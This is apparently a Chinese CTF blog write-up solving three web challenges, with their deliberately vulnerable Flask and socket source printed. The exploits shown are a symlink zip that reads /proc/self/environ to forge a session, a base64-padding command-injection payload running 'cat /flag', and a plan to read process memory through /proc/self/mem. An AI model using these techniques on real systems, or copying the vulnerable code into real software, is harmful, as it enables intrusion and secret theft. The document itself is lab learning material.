online_unzipper 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 import osimport uuidfrom flask import Flask, request, redirect, url_for, send_file, render_template, session, send_from_directory, abort, Responseapp = Flask(__name__) app.secret_key = os.environ.get("FLASK_SECRET_KEY" , "test_key" ) UPLOAD_FOLDER = os.path.join(os.getcwd(), "uploads" ) os.makedirs(UPLOAD_FOLDER, exist_ok=True ) users = {} @app.route("/" ) def index (): if "username" not in session: return redirect(url_for("login" )) return redirect(url_for("upload" )) @app.route("/register" , methods=["GET" , "POST" ] ) def register (): if request.method == "POST" : username = request.form["username" ] password = request.form["password" ] if username in users: return "用户名已存在" users[username] = {"password" : password, "role" : "user" } return redirect(url_for("login" )) return render_template("register.html" ) @app.route("/login" , methods=["GET" , "POST" ] ) def login (): if request.method == "POST" : username = request.form["username" ] password = request.form["password" ] if username in users and users[username]["password" ] == password: session["username" ] = username session["role" ] = users[username]["role" ] return redirect(url_for("upload" )) else : return "用户名或密码错误" return render_template("login.html" ) @app.route("/logout" ) def logout (): session.clear() return redirect(url_for("login" )) @app.route("/upload" , methods=["GET" , "POST" ] ) def upload (): if "username" not in session: return redirect(url_for("login" )) if request.method == "POST" : file = request.files["file" ] if not file: return "未选择文件" role = session["role" ] if role == "admin" : dirname = request.form.get("dirname" ) or str (uuid.uuid4()) else : dirname = str (uuid.uuid4()) target_dir = os.path.join(UPLOAD_FOLDER, dirname) os.makedirs(target_dir, exist_ok=True ) zip_path = os.path.join(target_dir, "upload.zip" ) file.save(zip_path) try : os.system(f"unzip -o {zip_path} -d {target_dir} " ) except : return "解压失败,请检查文件格式" os.remove(zip_path) return f"解压完成!<br>下载地址: <a href='{url_for('download' , folder=dirname)} '>{request.host_url} download/{dirname} </a>" return render_template("upload.html" ) @app.route("/download/<folder>" ) def download (folder ): target_dir = os.path.join(UPLOAD_FOLDER, folder) if not os.path.exists(target_dir): abort(404 ) files = os.listdir(target_dir) return render_template("download.html" , folder=folder, files=files) @app.route("/download/<folder>/<filename>" ) def download_file (folder, filename ): file_path = os.path.join(UPLOAD_FOLDER, folder, filename) try : with open (file_path, 'r' ) as file: content = file.read() return Response( content, mimetype="application/octet-stream" , headers={ "Content-Disposition" : f"attachment; filename={filename} " } ) except FileNotFoundError: return "File not found" , 404 except Exception as e: return f"Error: {str (e)} " , 500 if __name__ == "__main__" : app.run(host="0.0.0.0" )
抓包解cookie,发现需要伪造session,需要secretkey(笑死我了lmtx) 注意到upload路由
1 2 3 4 try : os.system(f"unzip -o {zip_path} -d {target_dir} " ) except : return "解压失败,请检查文件格式"
这不就是经典软链接吗
我直接读flag(屮,读不到),估计不叫flag
那先伪造admin吧
需要secretkey,直接读环境变量
1 2 ln -s /proc/self/environ env zip --symlinks a.zip env
我复现的时候的secretkey就是test
所以你直接flask-unsign就可以伪造出来了 然后重定向写入解压目录即可
这题比较简单
ping 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 import base64import subprocessimport reimport ipaddressimport flaskdef run_ping (ip_base64 ): try : decoded_ip = base64.b64decode(ip_base64).decode('utf-8' ) if not re.match (r'^\d+\.\d+\.\d+\.\d+$' , decoded_ip): return False if decoded_ip.count('.' ) != 3 : return False if not all (0 <= int (part) < 256 for part in decoded_ip.split('.' )): return False if not ipaddress.ip_address(decoded_ip): return False if len (decoded_ip) > 15 : return False if not re.match (r'^[A-Za-z0-9+/=]+$' , ip_base64): return False except Exception as e: return False command = f"""echo "ping -c 1 $(echo '{ip_base64} ' | base64 -d)" | sh""" try : process = subprocess.run( command, shell=True , check=True , capture_output=True , text=True ) return process.stdout except Exception as e: return False app = flask.Flask(__name__) @app.route('/ping' , methods=['POST' ] ) def ping (): data = flask.request.json ip_base64 = data.get('ip_base64' ) if not ip_base64: return flask.jsonify({'error' : 'no ip' }), 400 result = run_ping(ip_base64) if result: return flask.jsonify({'success' : True , 'output' : result}), 200 else : return flask.jsonify({'success' : False }), 400 @app.route('/' ) def index (): return flask.render_template('index.html' ) app.run(host='0.0.0.0' , port=5000 )
当时想着再蒸蒸就能出,但是还是去做志愿活动了(哈哈哈,也没办法)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 try : decoded_ip = base64.b64decode(ip_base64).decode('utf-8' ) if not re.match (r'^\d+\.\d+\.\d+\.\d+$' , decoded_ip): return False if decoded_ip.count('.' ) != 3 : return False if not all (0 <= int (part) < 256 for part in decoded_ip.split('.' )): return False if not ipaddress.ip_address(decoded_ip): return False if len (decoded_ip) > 15 : return False if not re.match (r'^[A-Za-z0-9+/=]+$' , ip_base64): return False except Exception as e: return False
这里正则写的很死,想绕过基本上是不可能的
注意到前端
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 <script> document .getElementById ("pingForm" ) .addEventListener ("submit" , function (event ) { event.preventDefault (); const ip = document .getElementById ("ip" ).value ; const ip_base64 = btoa (ip); const resultElement = document .getElementById ("result" ); const submitButton = document .getElementById ("submitBtn" ); resultElement.textContent = "Pinging..." ; resultElement.style .color = "var(--text-secondary-color)" ; submitButton.disabled = true ; submitButton.textContent = "Pinging..." ; fetch ("/ping" , { method : "POST" , headers : { "Content-Type" : "application/json" , }, body : JSON .stringify ({ ip_base64 : ip_base64 }), }) .then ((response ) => response .json () .then ((data ) => ({ status : response.status , body : data })) ) .then (({ status, body } ) => { if (status === 200 && body.success ) { resultElement.style .color = "var(--success-color)" ; resultElement.textContent = body.output ; } else { resultElement.style .color = "var(--error-color)" ; resultElement.textContent = "Ping failed: " + (body.error || "Invalid IP" ); } }) .catch ((error ) => { console .error ("Error:" , error); resultElement.style .color = "var(--error-color)" ; resultElement.textContent = "An error occurred" ; }) .finally (() => { submitButton.disabled = false ; submitButton.textContent = "Ping" ; }); }); </script>
这里是直接把我们输入的ip编码为base64然后发送过去
那就很可疑了,好端端的,偏偏要前端编码一次,后端解码一次,这就是猫腻所在,而且也因为前端的编码,把我们对后端的输入内容限制死了,只限制在点分十进制的ipv4地址上
所以这里用hackbar绕过前端 这样子我就可以直接输入base64编码的内容,来进行操作
接下来就是去查查会存在什么问题了
1 2 3 4 5 import base64import subprocessimport reimport ipaddressimport flask
导入base64库,这一整个题都在围绕base64展开,估计是有什么不为人知的小trick
跟进去看源码 这里用的是base64.b64decode
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 def b64decode (s, altchars=None , validate=False ): """Decode the Base64 encoded bytes-like object or ASCII string s. Optional altchars must be a bytes-like object or ASCII string of length 2 which specifies the alternative alphabet used instead of the '+' and '/' characters. The result is returned as a bytes object. A binascii.Error is raised if s is incorrectly padded. If validate is False (the default), characters that are neither in the normal base-64 alphabet nor the alternative alphabet are discarded prior to the padding check. If validate is True, these non-alphabet characters in the input result in a binascii.Error. For more information about the strict base64 check, see: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 """ s = _bytes_from_decode_data(s) if altchars is not None : altchars = _bytes_from_decode_data(altchars) assert len (altchars) == 2 , repr (altchars) s = s.translate(bytes .maketrans(altchars, b'+/' )) return binascii.a2b_base64(s, strict_mode=validate)
哈哈哈,还给了文档,去看看 没什么头绪
回过来重新阅读源码,发现猫腻
做正则过滤的时候,用的是python的base64过滤 而在ping的时候,是用shell的base64来进行解码,这其中肯定存在问题
1 command = f"""echo "ping -c 1 $(echo '{ip_base64} ' | base64 -d)" | sh"""
说明有某种方法可以绕过python的base64解码后的检查,同时也可以被shell正确解码,实现rce
重新读一下源码的注释
1 2 The result is returned as a bytes object. A binascii.Error is raised if s is incorrectly padded.
这里说s要是被错误填充的话,就会抛出一个binascii错误,去看看错误
挖草,一下子全部都清晰起来了 这里说的,如果 strict_mode 为真,则仅转换有效的 base64 数据。无效的 base64 数据将引发 binascii.Error
而我们看b64decode的源码
1 return binascii.a2b_base64(s, strict_mode=validate)
密码的 尴尬了兄弟,这里strict_mode一直都是false
看wp
这里有一个小trick(目前还不知道该如何去解释)
1 2 3 python的base64.b64decode不会对=之后的内容继续解码,从而通过只能是ip格式的校验, 而shell的base64 -d 会将编码从中间拆开分别解码再拼接,从而可以命令拼接执行,因此我们将两部分拆开即可0.0.0.0;cat /flag MC4wLjAuMA==O2NhdCAvZmxhZw==
成功拿到flag
关于我发现的那些东西,文档里讲的不太清楚,也有可能扯到new trick,我和拉蒙特徐讨论了之后,给python发了issue
最后issue被接受了,他们更改了那段模糊不清的解释
Peek a Fork 套接字吗,有点东西啊
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 import socketimport osimport hashlibimport fcntlimport reimport mmapwith open ('flag.txt' , 'rb' ) as f: flag = f.read() mm = mmap.mmap(-1 , len (flag)) mm.write(flag) os.remove('flag.txt' ) FORBIDDEN = [b'flag' , b'proc' , b'<' , b'>' , b'^' , b"'" , b'"' , b'..' , b'./' ] PAGE = """<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Secure Gateway</title> <style> body { font-family: 'Courier New', monospace; background-color: #0c0c0c; color: #00ff00; text-align: center; margin-top: 10%; } .container { border: 1px solid #00ff00; padding: 2rem; display: inline-block; } h1 { font-size: 2.5rem; text-shadow: 0 0 5px #00ff00; } p { font-size: 1.2rem; } .status { color: #ffff00; } </style> </head> <body> <div class="container"> <h1>Firewall</h1> <p class="status">STATUS: All systems operational.</p> <p>Your connection has been inspected.</p> </div> </body> </html>""" def handle_connection (conn, addr, log, factor=1 ): try : conn.settimeout(10.0 ) if log: with open ('log.txt' , 'a' ) as f: fcntl.flock(f, fcntl.LOCK_EX) log_bytes = f"{addr[0 ]} :{str (addr[1 ])} :{str (conn)} " .encode() for _ in range (factor): log_bytes = hashlib.sha3_256(log_bytes).digest() log_entry = log_bytes.hex () + "\n" f.write(log_entry) request_data = conn.recv(256 ) if not request_data.startswith(b"GET /" ): response = b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request" conn.sendall(response) return try : path = request_data.split(b' ' )[1 ] pattern = rb'\?offset=(\d+)&length=(\d+)' offset = 0 length = -1 match = re.search(pattern, path) if match : offset = int (match .group(1 ).decode()) length = int (match .group(2 ).decode()) clean_path = re.sub(pattern, b'' , path) filename = clean_path.strip(b'/' ).decode() else : filename = path.strip(b'/' ).decode() except Exception: response = b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request" conn.sendall(response) return if not filename: response_body = PAGE response_status = "200 OK" else : try : with open (os.path.normpath(filename), 'rb' ) as f: if offset > 0 : f.seek(offset) data_bytes = f.read(length) response_body = data_bytes.decode('utf-8' , 'ignore' ) response_status = "200 OK" except Exception as e: response_body = f"Invalid path" response_status = "500 Internal Server Error" response = f"HTTP/1.1 {response_status} \r\nContent-Length: {len (response_body)} \r\n\r\n{response_body} " conn.sendall(response.encode()) except Exception: pass finally : conn.close() os._exit(0 ) def main (): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 ) server.bind(('0.0.0.0' , 1337 )) server.listen(50 ) print (f"Server listening on port 1337..." ) while True : try : pid, status = os.waitpid(-1 , os.WNOHANG) except ChildProcessError: pass conn, addr = server.accept() initial_data = conn.recv(256 , socket.MSG_PEEK) if any (term in initial_data.lower() for term in FORBIDDEN): conn.sendall(b"HTTP/1.1 403 Forbidden\r\n\r\nSuspicious request pattern detected." ) conn.close() continue if initial_data.startswith(b'GET /?log=1' ): try : factor = 1 pattern = rb"&factor=(\d+)" match = re.search(pattern, initial_data) if match : factor = int (match .group(1 ).decode()) pid = os.fork() if pid == 0 : server.close() handle_connection(conn, addr, True , factor) except Exception as e: print ("[ERROR]: " , e) finally : conn.close() continue else : pid = os.fork() if pid == 0 : server.close() handle_connection(conn, addr, False ) conn.close() if __name__ == '__main__' : main()
知识盲区了属于是
稍微了解一下mmap文档
从文档中,可以看出来这里直接把flag写入了内存,然后删除了flag.txt AI给出的做法是
1 2 用“分片发送”的 trick 请求 proc/self/maps(绕过 256 字节 peek 的黑名单),拿到 maps; 解析 maps,找候选的可读 rw 区间,然后分别请求读取这些地址对应的 /proc/self/mem
这题要补充的知识稍微有点多,明天再看看